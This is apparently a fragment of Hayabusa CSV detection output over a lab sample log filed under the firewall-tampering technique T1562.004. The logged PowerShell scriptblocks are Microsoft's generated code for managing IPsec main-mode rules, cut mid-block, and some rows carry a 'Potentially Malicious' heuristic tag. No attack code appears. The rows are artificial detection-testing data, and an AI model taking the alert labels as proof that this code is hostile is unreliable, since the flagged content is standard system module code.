$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, 
[Parameter(Para",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { 
[object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, 
$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(Para",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"meterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { 
throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param(",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"meterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] 